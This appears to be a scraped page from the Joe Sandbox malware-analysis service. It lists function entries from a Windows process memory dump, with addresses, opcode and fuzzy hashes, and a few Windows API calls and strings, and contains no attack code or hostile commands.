Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f38556afc9f4fb48f9c729cfe12173fb3b7baf8db300b98a8c8dcd63691113e7
Instruction ID: d20b9d9e1090e653248b0811c9f191854daac996c4f2441b13c6715ca0189fb3
Opcode Fuzzy Hash: f38556afc9f4fb48f9c729cfe12173fb3b7baf8db300b98a8c8dcd63691113e7
Instruction Fuzzy Hash: 59C135B2B1895A8AE7248F68D5406B97291FF84B45F558135CBAB83780FE3EEC42D700

Function 00007FF63D253FB7 Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11713f9c325698c5a4cbdbbb9b6f7d6668058bd0e329f22ec9b794a443c06841
Instruction ID: fbe0db45354b491886eb31f2ed233d4d4eb4db84a9b7429250911ab8b285cfae
Opcode Fuzzy Hash: 11713f9c325698c5a4cbdbbb9b6f7d6668058bd0e329f22ec9b794a443c06841
Instruction Fuzzy Hash: EFC11132A18AD885EB718FA5D640BF8A762FB44784F008035DF5D8BB88EF39DA45D300

Function 00007FF63D2918A0 Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45e6aef55457c2443c5b088d1397cd23672a6d7b1e857d0121abdad2503938b4
Instruction ID: 3f28f3c6af3123b644615fe19dd991f285f1b6085f2479ea050d943ddedd3eef
Opcode Fuzzy Hash: 45e6aef55457c2443c5b088d1397cd23672a6d7b1e857d0121abdad2503938b4
Instruction Fuzzy Hash: 9AA15963A0D5D945EA578BA68A107BD6E51BF017A8F448370DF7A437C1EE38992AE300

Function 00007FF63D2CB720 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d685cfbb4e0108612038186cb04d13464fdb809f9b59df011451040a4bca3dd
Instruction ID: 12cb0c644ab6b0c9e77d110cd05aba8e2ac0289b395bf8c9ed6ff9be33e87d81
Opcode Fuzzy Hash: 5d685cfbb4e0108612038186cb04d13464fdb809f9b59df011451040a4bca3dd
Instruction Fuzzy Hash: F2A15553F5C2E48DE322CBB998101FD3FB2A716748B1841A5EFDA53B89DA34C951E320

Function 00007FF63D239B30 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8924e332cd299791c4bae2cd43cd037ec742393eab3221982e1d80e6e4bbfacf
Instruction ID: 7f2d3bf80e8bec460c887f0d8d3bb7197c2a86d159e672b446e0f9785b00ea2f
Opcode Fuzzy Hash: 8924e332cd299791c4bae2cd43cd037ec742393eab3221982e1d80e6e4bbfacf
Instruction Fuzzy Hash: C591C263F04DE493E751CF29D6006986320F368BD8B965322DF6E63661EB35E6DAC301

Function 00007FF63D24B200 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa471672b24d1a2ac654242ca81a1187fcbdff9b2a5c44fa8322d863862aa905
Instruction ID: de19f355774bd66e9b09a0525e621eb6aca3392d34abe97988177f8a28660a1d
Opcode Fuzzy Hash: aa471672b24d1a2ac654242ca81a1187fcbdff9b2a5c44fa8322d863862aa905
Instruction Fuzzy Hash: 74A15763B1879581F7228BA58A007AD7FB4F701B99F255122DF6D23780EFB9C952E310

Function 00007FF63D221A31 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec4063b42928823b40043d659ba538cc37fba7f203e95e04cb88dc07edcb3a95
Instruction ID: ebbaa60ab8fc7c4bf83a2606db08e8c99557f99b20991de7037f30be6b1f020d
Opcode Fuzzy Hash: ec4063b42928823b40043d659ba538cc37fba7f203e95e04cb88dc07edcb3a95
Instruction Fuzzy Hash: 92912161F3868981E9E69A529600BBA5361FF45BC8F444031FF4D57B85FE3DE545D300

Function 00007FF63D2D40C0 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4bfae1d20f5ed61c0578810f1b9d3c5e2bee1aa6a44f89206bb9bac95fbb713
Instruction ID: 2298e0bd4b63224a5d2e7e67f3af967584b94913c9d089406971703f8019ae17
Opcode Fuzzy Hash: b4bfae1d20f5ed61c0578810f1b9d3c5e2bee1aa6a44f89206bb9bac95fbb713
Instruction Fuzzy Hash: 4C91303290864ACAE7948FB9C14427CB7A1EF94B59F148136CB1983799EF78D446EB40

Function 00007FF63D2BD160 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba7d415c593592a3e4339d049df5d7c78054e37d5defce6cf568c9a001b84ead
Instruction ID: bafe62d55f530680287596ecc7f1df99b3c13120c820733fecfab18bd60e6e31
Opcode Fuzzy Hash: ba7d415c593592a3e4339d049df5d7c78054e37d5defce6cf568c9a001b84ead
Instruction Fuzzy Hash: 22616D62B185A946F7148FA49A002FD2BA1FB06B98F544231DF5B937D5DFBCD842E700

Function 00007FF63D2CBF20 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ca95f9bf79cadee7fd56b3ebd1ac633b5562677c2c3978bd7e233aabedc9847
Instruction ID: 2a5f5e99776adf8958e064365811142ed4d8c70d40e9a8abb7a82a1d7b8e74ce
Opcode Fuzzy Hash: 3ca95f9bf79cadee7fd56b3ebd1ac633b5562677c2c3978bd7e233aabedc9847
Instruction Fuzzy Hash: 415116A6E1C64946F6225BD59500BB866A1FF56BC0F849131FF0E83388EE6DDE81A740

Function 00007FF63D2CBDE0 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4aa9e4182f2e50364de2a15c1c1e0c896540baf561c3245e46b89c242035e23
Instruction ID: 112353f410d9210972fefeaa3df6b72911a53301d202402413f7c6afda223239
Opcode Fuzzy Hash: e4aa9e4182f2e50364de2a15c1c1e0c896540baf561c3245e46b89c242035e23
Instruction Fuzzy Hash: 7F512696E1868D42F7224BD58500BB87691EF56BC1F849131FF1E83389EE2DEE41AB41

Function 00007FF63D2AF5F0 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d76be46d653f83ad5ef5210ff2a4a8b857c13a8c348d2b6131243123030b049b
Instruction ID: d1107ba8ceed892259d04f8c79d3044000ba8e4f7a7283ffce17eb7a7db3adb1
Opcode Fuzzy Hash: d76be46d653f83ad5ef5210ff2a4a8b857c13a8c348d2b6131243123030b049b
Instruction Fuzzy Hash: 28310352B2561A43FE1885AA8E157B441829F45FF0E449331FF3EC7BE8FE3CA442A200

Function 00007FF63D2AF440 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb85a316b1b28cddb3f2e513620ffe2f1ab2d54091b22ff193b08dd246418135
Instruction ID: 76b4b10ee76e0f76167f77746dfa2ea4587c5ccba976a974d9b3fc0fdab616a4
Opcode Fuzzy Hash: cb85a316b1b28cddb3f2e513620ffe2f1ab2d54091b22ff193b08dd246418135
Instruction Fuzzy Hash: BA311252B2962A42FE69856A8E14B750183AF45BF0E559331FF3ECBBD8FD3C95426200

Function 00007FF63D28F960 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a4b5aaaee95637960a634f8f5c0b021c11b7ab42145f193b07c717f66579e7b
Instruction ID: 82f487d90d8a76cdc80317d061ed3dafc37b4b94ae6f2d2d52c79a477a48bba8
Opcode Fuzzy Hash: 2a4b5aaaee95637960a634f8f5c0b021c11b7ab42145f193b07c717f66579e7b
Instruction Fuzzy Hash: 2B1173F2F384A845FB64437C7D01F255D858B663BCB1897B4E275D1AD2EA1DF1439240

Function 00007FF63D2D5410 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aba1ab6dce893516dd973d8d6062043ca2dc6b32030dabdcf669dbffad7919a8
Instruction ID: c01191b9993afaeeb409761cfcd1614b2ab6bdeaca74e1d562a8a6215c8706c7
Opcode Fuzzy Hash: aba1ab6dce893516dd973d8d6062043ca2dc6b32030dabdcf669dbffad7919a8
Instruction Fuzzy Hash: 86012BB6B280E406DA80CB3A481897977A3DBC7796354D360D754C77C8EE3E9606E350

Function 00007FF63D3FBC00 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c307f67adb8aff98d3f095286b2b700dfcb55a183617c16c72d4ace8312b7d4
Instruction ID: 038cc99b61fe1a58f79dc842e8ffe6d2d7c0790616e2838ebdfb41b054369831
Opcode Fuzzy Hash: 7c307f67adb8aff98d3f095286b2b700dfcb55a183617c16c72d4ace8312b7d4
Instruction Fuzzy Hash:

Function 00007FF63D299484 Relevance: 24.1, APIs: 8, Strings: 8, Instructions: 107COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00007FF63D2994EE
memcmp.MSVCRT ref: 00007FF63D299508
memcmp.MSVCRT ref: 00007FF63D299522
memcmp.MSVCRT ref: 00007FF63D29953C
memcmp.MSVCRT ref: 00007FF63D299556
memcmp.MSVCRT ref: 00007FF63D299570
memcmp.MSVCRT ref: 00007FF63D29958A
memcmp.MSVCRT ref: 00007FF63D2995A4

Strings

wR12, xrefs: 00007FF63D29949F
wR15, xrefs: 00007FF63D2994C3
ACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPIDRRO_EL0TPIDR_EL0TPIDR_EL1TPIDR_EL2, xrefs: 00007FF63D2994DB
SPSR, xrefs: 00007FF63D2994CF
wR11, xrefs: 00007FF63D299493
wR10, xrefs: 00007FF63D299487
wR13, xrefs: 00007FF63D2994AB
wR14, xrefs: 00007FF63D2994B7

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memcmp
String ID: ACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPIDRRO_EL0TPIDR_EL0TPIDR_EL1TPIDR_EL2$SPSR$wR10$wR11$wR12$wR13$wR14$wR15
API String ID: 1475443563-3862453883
Opcode ID: b1a7e97f954b030fc789617bde8c08a95522fe00320205b97ede5649c0ca8685
Instruction ID: 68c2c27ba3e7ff47ca61296abaacd21bee6052f4789a5c6063d0226e566b4d49
Opcode Fuzzy Hash: b1a7e97f954b030fc789617bde8c08a95522fe00320205b97ede5649c0ca8685
Instruction Fuzzy Hash: 4F416DE9E0C20E88FA255AE7A6402B911605F02BE1F043032DB0ED77D1FE7DA911F659

Function 00007FF63D25A0C0 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 359COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF63D25A235
GetUserProfileDirectoryW.USERENV ref: 00007FF63D25A252
GetLastError.KERNEL32 ref: 00007FF63D25A290
GetLastError.KERNEL32 ref: 00007FF63D25A2AB

Part of subcall function 00007FF63D259C40: SetLastError.KERNEL32 ref: 00007FF63D259D6A
Part of subcall function 00007FF63D259C40: GetEnvironmentVariableW.KERNEL32 ref: 00007FF63D259D7C
Part of subcall function 00007FF63D259C40: GetLastError.KERNEL32 ref: 00007FF63D259D88
Part of subcall function 00007FF63D259C40: GetLastError.KERNEL32 ref: 00007FF63D259DA1

Strings

HOMEUSERPROFILE\\.\pipe\__rust_anonymous_pipe1__., xrefs: 00007FF63D25A0E8
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF63D25A67A

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ErrorLast$DirectoryEnvironmentProfileUserVariable
String ID: HOMEUSERPROFILE\\.\pipe\__rust_anonymous_pipe1__.$called `Result::unwrap()` on an `Err` value
API String ID: 3506484248-3720404459
Opcode ID: d7c07abaf9e50158387b918093629f4ed8af412cfd5b6e1afa6d678d6fcc476a
Instruction ID: 34359ed4c21dce02b5409953bfc81ab9dca775651695db7b2f0279b5dcf6851f
Opcode Fuzzy Hash: d7c07abaf9e50158387b918093629f4ed8af412cfd5b6e1afa6d678d6fcc476a
Instruction Fuzzy Hash: B2F1C121E08ACA49EB359FA59A057F96355FF04B98F414135DF5C9BB8AEE3CE7809300

Function 00007FF63D283F30 Relevance: 19.7, APIs: 9, Strings: 2, Instructions: 479COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF63D2840E5
GetFullPathNameW.KERNEL32 ref: 00007FF63D284101
GetLastError.KERNEL32 ref: 00007FF63D28410C
GetLastError.KERNEL32 ref: 00007FF63D284125

Strings

\\?\UNC\, xrefs: 00007FF63D284299
\\?\, xrefs: 00007FF63D284247

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ErrorLast$FullNamePath
String ID: \\?\$\\?\UNC\
API String ID: 2482867836-3019864461
Opcode ID: 1c0334674d31efb89d2c775229443127f9b9b7c2417acaa84a4584124165a396
